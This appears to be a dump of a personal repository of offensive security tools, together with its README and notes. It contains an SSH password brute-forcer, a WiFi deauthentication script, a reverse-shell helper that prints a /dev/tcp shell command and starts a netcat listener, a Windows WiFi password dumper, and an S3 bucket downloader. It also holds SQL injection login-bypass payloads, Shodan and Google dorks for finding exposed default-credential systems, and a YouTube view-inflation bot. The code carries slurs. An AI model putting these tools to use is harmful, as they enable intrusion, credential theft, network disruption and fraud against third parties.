├── things ├── adb.sh ├── btw.py ├── spina.py ├── chick.py ├── pysniffer.py ├── wnut.go ├── gugol.rb ├── tenkai.rb ├── dirfuzz.rb ├── deauth.py ├── ssl-scanner.rb ├── cholo.go ├── broski.rb ├── cade.py └── sexer-ssh.rb ├── LICENSE ├── payloads.md ├── README.md └── papers.md /things/adb.sh: -------------------------------------------------------------------------------- 1 | HOST="";CMD="" 2 | read -p "(HOST:PORT) connection to: " HOST 3 | adb connect $HOST 4 | while [ "$CMD" != "exit" ]; do 5 | read -p "$ " CMD 6 | adb shell $CMD 7 | done 8 | adb disconnect 9 | -------------------------------------------------------------------------------- /things/btw.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | HELP = """ 4 | Encode: python3 btw.py btw 5 | Decode: python3 btw.py unbtw 6 | """ 7 | def btw(btw): 8 | tbw = str() 9 | for i in list(btw): 10 | for s in range(ord(i)): 11 | tbw += "btw " 12 | tbw += "BTW " 13 | print(tbw) 14 | 15 | def unbtw(btw): 16 | if btw[-1] != " ": 17 | btw+=" " 18 | wtb = [chr(len(i.split(" "))-1) for i in btw.strip().split("BTW ")] 19 | print("".join([i for i in wtb])) 20 | 21 | try: 22 | if sys.argv[1].startswith("btw"): btw(sys.argv[2]) 23 | elif sys.argv[1].startswith("unbtw"): unbtw(open(sys.argv[2], "r").read()) 24 | except Exception as e: 25 | quit(f"{e}\n{HELP}") 26 | -------------------------------------------------------------------------------- /things/spina.py: -------------------------------------------------------------------------------- 1 | import subprocess,json,sys,os 2 | print("""\n\tSPINA\n\t _____ 3 | \t / \\\n\t| () () | 4 | \t \ ^ /\n\t |||||\n""") 5 | def main(port:int)->None: 6 | c=subprocess.Popen(args=["ngrok","tcp",str(port)],stdout=subprocess.DEVNULL,stderr=subprocess.STDOUT) 7 | __import__("time").sleep(1) #delay to start ngrok 8 | a=subprocess.Popen(args=["curl","-s","localhost:4040/api/tunnels"],stdout=subprocess.PIPE) 9 | b=json.loads(a.communicate()[0])['tunnels'][0]['public_url'].split("//")[1].split(":") 10 | print(f"\nConnection command: sh -i >& /dev/tcp/{b[0]}/{b[1]} 0>&1\n") 11 | os.system(f"nc -lvnp {port}") 12 | if __name__ == "__main__": 13 | try:main(int(sys.argv[1])) 14 | except Exception as e: 15 | c.kill() 16 | quit(e) 17 | else:pass -------------------------------------------------------------------------------- /things/chick.py: -------------------------------------------------------------------------------- 1 | from time import sleep 2 | from threading import Thread 3 | from keyboard import is_pressed 4 | from pyautogui import prompt, confirm, alert, leftClick 5 | thunberg=False 6 | def detect(char:str): 7 | global thunberg 8 | while True: 9 | if is_pressed(char): 10 | thunberg=True 11 | return 12 | try: 13 | nigga:str=prompt("Type the stop execution character: ") 14 | if len(nigga)!=1: raise TypeError("Write a character.") 15 | delay=float(prompt("Type the delay: ")) 16 | confirm(f"You can press '{nigga}' during execution to stop.\nPress OK to start in 3 seconds.") 17 | sleep(3) 18 | dk=Thread(target=detect, args=(nigga,)) 19 | dk.start() 20 | while not thunberg: 21 | leftClick() 22 | sleep(delay) 23 | except Exception as e: 24 | alert(str(e)) 25 | -------------------------------------------------------------------------------- /things/pysniffer.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import signal 3 | from scapy.all import * 4 | from time import sleep 5 | 6 | print('\u001b[33;1m'+""" 7 | ___ 8 | / / 9 | __/ _/ 10 | / _/ 11 | /_ / 12 | / / 13 | / / 14 | //\n 15 | Press 2 times ctrl+c to exit 16 | """) 17 | sleep(1.5) 18 | 19 | def exit_nigga(sussy, baka): 20 | print('\u001b[36;1m'+"All saved in log.pcap file!") 21 | sys.exit() 22 | 23 | def infinity(owo): 24 | while True: 25 | wrpcap("log.pcap", owo) 26 | yield 27 | 28 | def main(): 29 | print('\u001b[36;1m'+"Local traffic:\n") 30 | try: 31 | desc = '\u001b[32;1m'+"%IP.dst% to %IP.src%\n" 32 | for i in infinity(sniff(filter="127.0.0.1", prn=lambda x:x.sprintf(desc))): 33 | signal.signal(signal.SIGINT, exit_nigga) 34 | except Exception as sesso: 35 | print('\u001b[31;1m'+f"\nERROR: {sesso}"+'\u001b[0m') 36 | sys.exit() 37 | 38 | main() 39 | -------------------------------------------------------------------------------- /things/wnut.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "os/exec" 6 | "strings" 7 | ) 8 | 9 | func main() { 10 | cmd := exec.Command("netsh", "wlan", "show", "profiles") 11 | output, err := cmd.Output() 12 | if err != nil { 13 | return 14 | } 15 | profiles := string(output) 16 | lines := strings.Split(profiles, "\n") 17 | for i, j := 0, len(lines)-1; i < j; i, j = i+1, j-1 { 18 | lines[i], lines[j] = lines[j], lines[i] 19 | } 20 | var wifiProfiles []string 21 | for _, v := range lines { 22 | if strings.Contains(v, ":") { 23 | profile := strings.TrimSpace(strings.Split(v, ":")[1]) 24 | wifiProfiles = append(wifiProfiles, profile) 25 | } 26 | } 27 | f, _ := os.Create("net_dump.txt") 28 | for _, profile := range wifiProfiles { 29 | cmd := exec.Command("netsh", "wlan", "show", "profile", profile, "key=clear") 30 | output, err := cmd.Output() 31 | if err != nil { 32 | continue 33 | } 34 | f.WriteString(string(output)+"\n\n\n") 35 | } 36 | f.Close() 37 | } 38 | -------------------------------------------------------------------------------- /things/gugol.rb: -------------------------------------------------------------------------------- 1 | require 'nokogiri' 2 | require 'open-uri' 3 | require 'cgi' 4 | 5 | def main(query) 6 | g = "https://google.com/search?q=" 7 | begin 8 | search = Nokogiri::HTML(URI.open(g+=CGI.escape(query))).css("a[href]").map{|element|element["href"]} 9 | results = Array.new() 10 | puts "\nResults:\n" 11 | search.each do |link| 12 | Fiber.new { 13 | if link.start_with?("/search?", "/?sa=") 14 | results.delete(link) 15 | else 16 | results.append(link) 17 | end 18 | Fiber.yield 19 | }.resume 20 | end 21 | results.each do |uwu| 22 | Fiber.new{ 23 | if uwu.include?(query) || uwu.start_with?("/url?q") 24 | puts uwu.gsub("/url?q=", "\n") 25 | end 26 | Fiber.yield 27 | }.resume 28 | end 29 | rescue => e 30 | puts e 31 | end 32 | end 33 | 34 | print"search: " 35 | main(gets.chomp) 36 | -------------------------------------------------------------------------------- /things/tenkai.rb: -------------------------------------------------------------------------------- 1 | require 'http' 2 | require 'json' 3 | require 'open-uri' 4 | 5 | def compromised(email, view_domains) 6 | r=HTTP.get("https://api.threatcop.com/api/tool/emailCheck?email=#{email}",:headers=>{"Content-Type"=>"application/json"}) 7 | res=JSON.load(r.body) 8 | if res["success"] 9 | puts email 10 | if view_domains 11 | res["emailCheck"].length().times do |i| 12 | puts "\t"+res["emailCheck"][i]["Domain"] 13 | end 14 | end 15 | end 16 | end 17 | 18 | begin 19 | if File.exist?(ARGV[0]) 20 | File.open(ARGV[0]).map{|x|x.chomp}.each do |y| 21 | compromised(y, ARGV[1]=="-d"?true:false) 22 | end 23 | elsif URI::MailTo::EMAIL_REGEXP.match?(ARGV[0]) 24 | compromised(ARGV[0], ARGV[1]=="-d"?true:false) 25 | else 26 | raise TypeError 27 | end 28 | rescue TypeError 29 | puts "Usage: ruby tenkai.rb [ email / emails-file ]\n\t-d (optional) view in which sites the email was found compromised" 30 | rescue => e 31 | abort(e.to_s) 32 | end 33 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 komodo 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /things/dirfuzz.rb: -------------------------------------------------------------------------------- 1 | require 'net/http' 2 | require 'open-uri' 3 | require 'openssl' 4 | 5 | $a=0 #disable SSL verification 6 | OpenSSL::SSL::VERIFY_PEER = OpenSSL::SSL::VERIFY_NONE 7 | 8 | def fuzzer(link, wordlist) 9 | wordlist = File.open(wordlist) 10 | ohyes = wordlist.map {|x| x.chomp } 11 | link.delete_suffix!("/") unless link[-1..-1] != "/" 12 | ohyes.each do |dir| 13 | uriiii = URI("#{link}/#{dir}/") 14 | requestt = Net::HTTP.get_response(uriiii) 15 | if requestt.code == '200' 16 | puts "\ndirectory open! '#{dir}'" 17 | log = File.new("valid.log", "a") 18 | log.write(dir+"\n") 19 | log.close() 20 | puts "saved on valid.log file" 21 | elsif requestt.code != '404' 22 | puts "\ndirectory: '#{dir}' code: #{requestt.code}" 23 | else 24 | ($a%2==0)?(print"\b%"):(print"\b#") 25 | $a+=1 #cool waiting animation 26 | end 27 | end 28 | end 29 | 30 | begin 31 | print "URL: " 32 | url=gets.chomp 33 | print "Wordlist: " 34 | fuzzer(url, gets.chomp) 35 | rescue => e 36 | puts e 37 | end 38 | -------------------------------------------------------------------------------- /things/deauth.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | import argparse, os 3 | 4 | parser = argparse.ArgumentParser(description="Deauthenticate temporarily all devices connected to a WI-FI network (IEEE 802.11w)") 5 | parser.add_argument("BSSID", help="MAC address of the wireless access point",type=str) 6 | parser.add_argument("-s","--seconds", help="disconnection time in seconds from the network. (default: 10)", nargs="?", const=10, default=10, type=int) 7 | parser.add_argument("-i","--interface", help="Wireless interface. (default: wlan0)", nargs="?", const="wlan0", default="wlan0", type=str) 8 | args = parser.parse_args() 9 | 10 | MAC_BROADCAST:str = "ff:ff:ff:ff:ff:ff" 11 | 12 | def switch_interface(mon=True)->None: 13 | os.system(f"ifconfig {args.interface} down") 14 | os.system(f"iwconfig {args.interface} mode {'monitor'if mon else'managed'}") 15 | os.system(f"ifconfig {args.interface} up") 16 | 17 | try: 18 | switch_interface() 19 | deauth = Dot11(addr1=MAC_BROADCAST,addr2=args.BSSID,addr3=args.BSSID) 20 | pkt = RadioTap()/deauth/Dot11Deauth(reason=7) 21 | sendp(pkt, inter=0.1, count=args.seconds*10, iface=args.interface, verbose=1) 22 | switch_interface(False) 23 | except Exception as e: 24 | print(f"Error: {e}") 25 | -------------------------------------------------------------------------------- /things/ssl-scanner.rb: -------------------------------------------------------------------------------- 1 | require 'open-uri' 2 | require 'rex/sslscan' 3 | 4 | def ssl_scan 5 | begin 6 | print "\n[?] Address: " 7 | remote_addr = gets.chomp 8 | begin 9 | sus = URI.open("https://#{remote_addr}") 10 | puts "[+] #{remote_addr} have ssl!" 11 | rescue OpenSSL::SSL::SSLError, Errno::EHOSTUNREACH => bruh #yes... ingenious, right? 12 | puts "[!] #{remote_addr} haven't ssl: #{bruh}" 13 | rescue SocketError => e 14 | puts "[!] Enable to get connection at #{remote_addr}" 15 | end 16 | print "\r[?] Are you sure to continue? (y/n): " 17 | option = gets.chomp 18 | if option == "y" 19 | scan = Rex::SSLScan::Scanner.new(remote_addr, 443) #443: number of ssl port 20 | results = scan.scan 21 | print results.to_s 22 | log = File.new("scan.log", "a") 23 | log.write(results.to_s) 24 | puts "\r[!] Scan finished! Check scan.log file\n" 25 | elsif option == "n" 26 | puts "[*] Ok, Bye." 27 | exit() 28 | else 29 | puts "\n[!] did you select the 'y' or the 'n' kiddo?" 30 | end 31 | rescue StandardError => err 32 | puts "\r[!] Error: You are retard\n#{err}" 33 | end 34 | end 35 | print ssl_scan 36 | -------------------------------------------------------------------------------- /things/cholo.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "io" 5 | "os" 6 | "fmt" 7 | "regexp" 8 | "net/http" 9 | "path/filepath" 10 | "strings" 11 | ) 12 | 13 | func main() { 14 | var bucket, URL string 15 | bucket = os.Args[1] 16 | if strings.HasPrefix(bucket, "https://") { 17 | URL = bucket 18 | bucket = strings.TrimPrefix(bucket, "https://") 19 | if strings.HasSuffix(bucket, "/") { bucket = strings.TrimSuffix(bucket, "/") } 20 | } else { URL = fmt.Sprintf("https://%s.s3.amazonaws.com/", bucket) } 21 | client := &http.Client{ Transport: &http.Transport{}, } 22 | req, _ := http.NewRequest("GET", URL, nil) 23 | req.Header.Set("User-Agent", "Mozilla/5.0") 24 | resp, _ := client.Do(req) 25 | defer resp.Body.Close() 26 | if resp.StatusCode!=200 { 27 | fmt.Println("Code:", resp.StatusCode) 28 | return 29 | } 30 | fmt.Println("Valid Bucket!", bucket) 31 | re := regexp.MustCompile("(.*?)") 32 | body, _ := io.ReadAll(resp.Body) 33 | keys := re.FindAllStringSubmatch(string(body), -1) 34 | for _, key := range keys { 35 | fmt.Print("\nDownloading ", bucket+"/"+key[1]) 36 | os.MkdirAll(bucket+"/"+filepath.Dir(key[1]), os.ModePerm) 37 | req, _ := http.NewRequest("GET", URL+key[1], nil) 38 | req.Header.Set("User-Agent", "Mozilla/5.0") 39 | resp, _ := client.Do(req) 40 | defer resp.Body.Close() 41 | if resp.StatusCode!=200 { // could be denied access to that specific resource or rate limit 42 | fmt.Print(" ", resp.StatusCode) 43 | continue 44 | } 45 | content, _ :=io.ReadAll(resp.Body) 46 | file, err := os.Create(bucket+"/"+key[1]) 47 | if err != nil { fmt.Print(" Error") } 48 | file.Write(content) 49 | file.Close() 50 | } 51 | fmt.Println() 52 | } 53 | 54 | /* 55 | COMPILE: go build cholo.go && chmod +x cholo.go 56 | 57 | USAGE EXAMPLES 58 | 59 | while IFS= read -r bucket; do ./cholo "$bucket" 2>/dev/null; done < buckets.txt 60 | ./cholo bucketname 61 | ./cholo https://s3.bucketname.com/ 62 | */ 63 | -------------------------------------------------------------------------------- /things/broski.rb: -------------------------------------------------------------------------------- 1 | require 'net/http' 2 | require 'open-uri' 3 | 4 | puts """ 5 | ,-----. ,------. ,-----. ,---. ,--. ,--.,--. 6 | | |) /_ | .--. '' .-. '' .-' | .' /| | 7 | | .-. \| '--'.'| | | |`. `-. | . ' | | 8 | | '--' /| |\ \ ' '-' '.-' || |\ \| | 9 | `------' `--' '--' `-----' `-----' `--' '--'`--' 10 | """ 11 | 12 | def main(url) 13 | #Some payloads from https://github.com/payloadbox/sql-injection-payload-list 14 | payloads = ["'","''","`","``",",",'"','""', 15 | "' OR '1", "' OR '' = '", "'='", "'=0--+", 16 | "'''''''''''''UNION SELECT '2", "%00", "||", "+","%" 17 | ] 18 | 19 | #Some errors found on ghdb 20 | 21 | errors = ["mysql_num_rows()","You have an error in your SQL syntax", 22 | "mysql_fetch_array()", "mysql_query()", "Microsoft SQL Native Client error.", 23 | "unexpected end of SQL command"] 24 | 25 | payloads.each do |test| 26 | target = URI.parse(url) 27 | target.query += test 28 | response = Net::HTTP.get_response(target) 29 | if response.code == "200" 30 | errors.each do |mhmh| 31 | if response.body.include?(mhmh) 32 | puts "\n#{target.to_s} is vulnerable \n#{mhmh}\n\n" 33 | end 34 | end 35 | elsif response.code == "500" 36 | puts "\n#{target.to_s} is vulnerable \n(500 internal server error)" 37 | elsif response.code == "403" 38 | puts "\n403 forbidden :skull:" 39 | else 40 | puts "\nStatus code: "+response.code 41 | end 42 | end 43 | end 44 | 45 | begin 46 | print "\nTarget: " 47 | main(gets.chomp) 48 | rescue NoMethodError 49 | puts "\nWarning: the target does not appear to have a query" 50 | puts "Example target: http://testasp.vulnweb.com/showforum.asp?id=0" 51 | rescue => error 52 | puts error 53 | end 54 | -------------------------------------------------------------------------------- /things/cade.py: -------------------------------------------------------------------------------- 1 | from selenium.webdriver.common.keys import Keys 2 | from selenium.webdriver.common.by import By 3 | from selenium import webdriver 4 | import multiprocessing, time 5 | 6 | opt=webdriver.ChromeOptions() 7 | opt.add_argument("--mute-audio") 8 | opt.add_argument("--disable-blink-features=AutomationControlled") 9 | opt.add_experimental_option("excludeSwitches", ["enable-automation"]) 10 | opt.add_experimental_option("useAutomationExtension", False) 11 | 12 | DELAY:int=30 13 | BANNER = '''\n 14 | o 15 | o^/|\^o 16 | o_^|\/*\/|^_o 17 | o\*`'.\|/.'`*/o 18 | \\\\\\\\\\\\|////// 19 | {><><@><><} 20 | `"""""""""`\n 21 | \tA Youtube views generator, with multiprocessing. 22 | \tInspired to "Cade", the greatest carder. 23 | ''' 24 | 25 | def main(sex:str, times:int=0xff)-> None: 26 | global DELAY, opt 27 | son_arkos = webdriver.Chrome(options=opt); 28 | cookies = ('//*[@id="content"]/div[2]/div[6]/div[1]/ytd-button-renderer[2]'+ 29 | '/yt-button-shape/button/yt-touch-feedback-shape/div/div[2]') 30 | for _ in range(times) if times is int else times: 31 | son_arkos.get(sex); 32 | time.sleep(DELAY/10-1); #delay to accept cookies 33 | son_arkos.find_element(By.XPATH, cookies).click(); 34 | Keys.SPACE; 35 | time.sleep(DELAY+5); 36 | son_arkos.delete_all_cookies() #son_arkos.refresh() will crush lol 37 | son_arkos.close() 38 | 39 | if __name__ == "__main__": 40 | try: 41 | print(BANNER) 42 | cade:list=[] 43 | url:str=input("Youtube video URL: ") 44 | times=input("(press enter to loop) Number of times: ") 45 | tabs=input("Number of tabs: ") 46 | if times == "" or "\n": times=iter(int,1) 47 | for k in range(int(tabs)): 48 | kk=multiprocessing.Process(target=main,args=(url,times),) 49 | kk.start();cade.append(kk) 50 | for kkk in cade: kkk.join() 51 | except Exception as e: 52 | quit(f"\nERROR:{e}\n"); 53 | else: pass 54 | -------------------------------------------------------------------------------- /payloads.md: -------------------------------------------------------------------------------- 1 | # Capybara 2 | The goal of this page is just to get attention.
3 | Why do i have to seriously write online some payloads when there are already [thousands of them](https://github.com/swisskyrepo/PayloadsAllTheThings) online for any type of vulnerability? 4 | Anyway, i suggest these websites to study or review vulns!
5 | https://www.invicti.com/learn/
6 | https://www.hacksplaining.com/lessons
7 | https://portswigger.net/web-security 8 | # Payloads 9 | 10 | 1) Generic XSS payloads 11 | 2) Various boolean based SQL injection payloads 12 | 13 | ## Generic xss payloads. 14 | 15 | #### Cookie stealer 16 | ```js 17 | 18 | ``` 19 | For example, to start a little server with php and ngrok i do: 20 | `php -S localhost:` 21 | `ngrok http ` 22 | 23 | #### Redirect 24 | Achieve Open redirect 25 | ```js 26 | 27 | ``` 28 | 29 | #### Include External Script 30 | ```js 31 | 32 | ``` 33 | 34 | #### Overwrite body 35 | Useful if a deface is needed 36 | ```js 37 | 38 | 39 | ``` 40 | 41 | ### Other 42 | Just search on google, you will find a lot of ways to escape filters 43 | ```js 44 | 45 | document.write(location.search(">

48 | 49 | move the cursor here 50 | 51 | 52 | 53 | ``` 54 | 55 | ## Various boolean based SQL injection payloads 56 | Taken from this website, "[**Sql injection cheat sheet by invicti**](https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet/)" (a read is strongly suggested) 57 | ```sql 58 | admin' -- 59 | admin' # 60 | admin'/* 61 | ' or 1=1-- 62 | ' or 1=1# 63 | ' or 1=1/* 64 | ') or '1'='1-- 65 | ') or ('1'='1-- 66 | ``` 67 | -------------------------------------------------------------------------------- /things/sexer-ssh.rb: -------------------------------------------------------------------------------- 1 | require 'net/ssh' 2 | 3 | puts """ 4 | ██████╗███████╗██╗ ██╗███████╗██████╗ ██████╗ ██████╗██╗ ██╗ 5 | ██╔════╝██╔════╝╚██╗██╔╝██╔════╝██╔══██╗ ██╔════╝██╔════╝██║ ██║ 6 | ╚█████╗ █████╗ ╚███╔╝ █████╗ ██████╔╝ ╚█████╗ ╚█████╗ ███████║ 7 | ╚═══██╗██╔══╝ ██╔██╗ ██╔══╝ ██╔══██╗ ╚═══██╗ ╚═══██╗██╔══██║ 8 | ██████╔╝███████╗██╔╝╚██╗███████╗██║ ██║ ██████╔╝██████╔╝██║ ██║ 9 | ╚═════╝ ╚══════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ 10 | Simple SSH bruter, made by komodo. 11 | """ 12 | def main 13 | begin 14 | print "[+] host: " 15 | host = gets.chomp 16 | 17 | print "[?] user: 'root', change it? y/n " 18 | nigga = gets.chomp 19 | if nigga == "y" 20 | print "[+] user: " 21 | user = gets.chomp 22 | elsif nigga == "n" 23 | user = "root" 24 | end 25 | 26 | print "[+] wordlist: " 27 | wordlist = gets.chomp 28 | puts "\n" 29 | sex = File.open(wordlist) 30 | magik = sex.map {|x| x.chomp} 31 | magik.each do |pass| 32 | begin 33 | Net::SSH.start(host, user, password: pass, :auth_methods => ["password"], 34 | :port => 22, :verify_host_key => :never, 35 | :non_interactive => true, :timeout => 5) do |ssh| 36 | print ssh 37 | puts "\n[!] Password found! #{pass}" 38 | break 39 | end 40 | rescue Net::SSH::AuthenticationFailed => no 41 | puts "\r#{no}, password '#{pass}'" 42 | puts "\n" 43 | rescue Net::SSH::Timeout 44 | puts "Error: #{host} has disconnected" 45 | rescue Errno::ECONNREFUSED 46 | puts "Error: connection refused." 47 | rescue Net::SSH::ConnectionTimeout 48 | puts "Error: #{host} isn't alive." 49 | rescue Net::SSH::Authentication::DisallowedMethod 50 | puts "Error: #{host} disallow the password authentication method." 51 | end 52 | end 53 | rescue => exception 54 | puts "[-] ERROR" 55 | print exception 56 | puts "\n" 57 | end 58 | end 59 | 60 | print main 61 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ![aaq](https://github.com/user-attachments/assets/750c38c2-f395-4d8d-a58e-14db1051f00a) 2 | 3 | # Some things 4 | I writed a blog that contains maybe the most interesting parts of this repository, [Terrons](https://terrons.pages.dev).
5 | This is just a mess filled with some bullshits- 6 | 7 | **[Mass Hunting Notes 🙀💯](https://github.com/komodoooo/some-things/blob/main/papers.md)**
8 | **[XSS & SQLi login bypass Payloads 🐒😱](https://github.com/komodoooo/some-things/blob/main/payloads.md)** 9 | 10 |

11 |

Goofy tools 😱🔥

12 | 13 | * **[Autoclicker](https://github.com/komodoooo/Some-things/blob/main/things/chick.py)** 14 | * **[Basic SQL injection scanner](https://github.com/komodoooo/some-things/blob/main/things/broski.rb)** 15 | * **[BTW Encoding](https://github.com/komodoooo/some-things/blob/main/things/btw.py)** 16 | * **[Compromised email checker](https://github.com/komodoooo/Some-things/blob/main/things/tenkai.rb)** 17 | * **[Wifi deauth attack script](https://github.com/komodoooo/Some-things/blob/main/things/deauth.py)** 18 | * **[Directory fuzzer](https://github.com/komodoooo/Some-things/blob/main/things/dirfuzz.rb)** 19 | * **[Dump public S3 buckets](https://github.com/komodoooo/Some-things/blob/main/things/cholo.go)** 20 | * **[Edit strings in binary files](https://gist.github.com/komodoooo/9df08a7fd32f13c5e08773512ed14910)** 21 | * **[Google url crawler](https://github.com/komodoooo/some-things/blob/main/things/gugol.rb)** 22 | * **[Network sniffer](https://github.com/komodoooo/some-things/blob/main/things/pysniffer.py)** 23 | * **[Ssh bruter](https://github.com/komodoooo/some-things/blob/main/things/sexer-ssh.rb)** 24 | * **[Ssl scanner](https://github.com/komodoooo/some-things/blob/main/things/ssl-scanner.rb)** 25 | * **[Windows Network profiles dumper](https://github.com/komodoooo/Some-things/blob/main/things/wnut.go)** 26 | * **[YouTube views generator](https://github.com/komodoooo/some-things/blob/main/things/cade.py)** 27 |

28 |

29 |

Random Proof of Concepts 🤓🙀

30 | 31 | * **[CVE-2024-7120](https://gist.github.com/komodoooo/bae8e73df6e28278ed737d1b10212648)** 32 | * **[CVE-2024-5947](https://github.com/komodoooo/Some-things/blob/main/papers.md#deep-sea-electronics-default-credentials)** 33 | * **[CVE-2024-31621](https://gist.github.com/komodoooo/3666c2a3dc8db566d439f7a936c90ea7)** 34 | * **[CVE-2024-22901](https://github.com/komodoooo/Some-things/blob/main/papers.md#Vinchin-default-MySQL-credentials)** 35 | * **[CVE-2023-45852](https://gist.github.com/komodoooo/edacac1987268273f48afe752f4efb31)** 36 | * **[CVE-2023-43261](https://gist.github.com/komodoooo/f157ceff2ec609d6be2ef21ef252a928)** 37 | * **[CVE-2023-38433](https://github.com/komodoooo/Some-things/blob/main/papers.md#Fujitsu-IP-series-hardcoded-credentials)** 38 | * **[CVE-2023-37265](https://gist.github.com/komodoooo/1727bdf564a94df60e756bafa4e449b5)** 39 | * **[CVE-2023-34598](https://gist.github.com/komodoooo/bf9bfea7f229d503e91d108940cf5ec0)** 40 | * **[CVE-2023-33568](https://gist.github.com/komodoooo/5bf30ba86dc5991304fcf34a7a6f5e26)** 41 | * **[CVE-2023-28432](https://gist.github.com/komodoooo/645a7ad31a5a615926d50ffb764992f2)** 42 | * **[CVE-2023-27350](https://gist.github.com/komodoooo/43f034a62486bf8051b5075ebf5eac32)** 43 | * **[CVE-2023-23333](https://gist.github.com/komodoooo/046a5000af5a0e092dc0dfacdbbddd2f)** 44 | * **[CVE-2022-1388](https://gist.github.com/komodoooo/77aca9410767e6d0063191c0bc7b27e9)** 45 | * **[CVE-2021-41773](https://gist.github.com/komodoooo/6124615213e64ebe6170c709c1fad138)** 46 | * **[CVE-2020-3452](https://gist.github.com/komodoooo/ca6ac04f43f14d32f69823d9cfba50c2)** 47 | * **[CVE-2014-0160](https://gist.github.com/komodoooo/4f4b330ab727a5c63d834fcc7bdc433b)** 48 | * **[CVE-2010-1598](https://gist.github.com/komodoooo/4b5d09e924418ea2654baee25905f851)** 49 |

50 | 51 | ###### **I will add new things.** 52 | -------------------------------------------------------------------------------- /papers.md: -------------------------------------------------------------------------------- 1 | # Table of contents 2 | * [Admin login panels vulnerable to SQLi](https://github.com/komodoooo/Some-things/blob/main/papers.md#Admin-login-panels-vulnerable-to-SQLi) 3 | * [Algo hardcoded password](https://github.com/komodoooo/Some-things/blob/main/papers.md#Algo-hardcoded-password) 4 | * [Android debug bridge misconfiguration](https://github.com/komodoooo/Some-things/blob/main/papers.md#Android-debug-bridge-misconfiguration) 5 | * [BigAnt Admin hardcoded password](https://github.com/komodoooo/Some-things/blob/main/papers.md#BigAnt-Admin-hardcoded-password) 6 | * [Cassandra exposed databases authfree](https://github.com/komodoooo/Some-things/blob/main/papers.md#Cassandra-exposed-databases-authfree) 7 | * [Deep Sea electronics default credentials](https://github.com/komodoooo/Some-things/blob/main/papers.md#deep-sea-electronics-default-credentials) 8 | * [Elasticsearch misconfiguration](https://github.com/komodoooo/Some-things/blob/main/papers.md#Elasticsearch-misconfiguration) 9 | * [Find exposed discord webhooks](https://github.com/komodoooo/Some-things/blob/main/papers.md#Find-exposed-discord-webhooks) 10 | * [Firebase misconfiguration](https://github.com/komodoooo/Some-things/blob/main/papers.md#Firebase-misconfiguration) 11 | * [FTP servers with anonymous login allowed ](https://github.com/komodoooo/Some-things/blob/main/papers.md#FTP-servers-with-anonymous-login-allowed) 12 | * [Fujitsu IP series hardcoded credentials](https://github.com/komodoooo/Some-things/blob/main/papers.md#Fujitsu-IP-series-hardcoded-credentials) 13 | * [Jenkins code execution](https://github.com/komodoooo/Some-things/blob/main/papers.md#Jenkins-code-execution) 14 | * [LDAP anonymous binding allowed](https://github.com/komodoooo/Some-things/blob/main/papers.md#LDAP-anonymous-binding-allowed) 15 | * [LG Signage default credentials](https://github.com/komodoooo/Some-things/blob/main/papers.md#LG-Signage-default-credentials) 16 | * [Redis auth free access](https://github.com/komodoooo/Some-things/blob/main/papers.md#Redis-auth-free-access) 17 | * [Rsync exposed files](https://github.com/komodoooo/Some-things/blob/main/papers.md#Rsync-exposed-files) 18 | * [SIMATIC HMI_Panel default credentials](https://github.com/komodoooo/Some-things/blob/main/papers.md#SIMATIC-HMI_Panel-default-credentials) 19 | * [SMB server misconfiguration](https://github.com/komodoooo/Some-things/blob/main/papers.md#SMB-server-misconfiguration) 20 | * [SQLite Web free panel](https://github.com/komodoooo/Some-things/blob/main/papers.md#SQLite-web-free-panel) 21 | * [Vinchin default MySQL credentials](https://github.com/komodoooo/Some-things/blob/main/papers.md#Vinchin-default-MySQL-credentials) 22 | * [VNC Servers with auth disabled](https://github.com/komodoooo/Some-things/blob/main/papers.md#VNC-Servers-with-auth-disabled) 23 |

_"A bit of my experience about messing around on the internet"_

24 | 25 | # Admin login panels vulnerable to SQLi 26 | Payload: _`1'or'1'='1`_ 27 | ### Google dork 28 | [`intitle:"Login" inurl:/admin/index.php`](https://www.google.com/search?q=intitle%3A%22Login%22+inurl%3A%2Fadmin%2Findex.php) 29 | # Algo hardcoded password 30 | ### Login 31 | Default password: _`algo`_ 32 | ### Shodan query 33 | [`http.favicon.hash:-1024590169`](https://www.shodan.io/search?query=http.favicon.hash%3A-1024590169) 34 | # Android debug bridge misconfiguration 35 | ### installing ADB 36 | Debian: `apt install android-tools` 37 | 38 | Arch: `pacman -S android-tools` 39 | ### Connect to ADB device 40 | **Use [this bash script](https://github.com/komodoooo/Some-things/blob/main/tools/adb/adb.sh)** or connect manually (default port is 5555) 41 | ### Shodan query 42 | [`"Android debug bridge (ADB)" -Authentication`](https://www.shodan.io/search?query=%22Android+debug+bridge+%28ADB%29%22+-Authentication) 43 | # BigAnt Admin hardcoded password 44 | ### Login 45 | Default password: _`123456`_ 46 | ### Zoomeye dork 47 | [`"password: 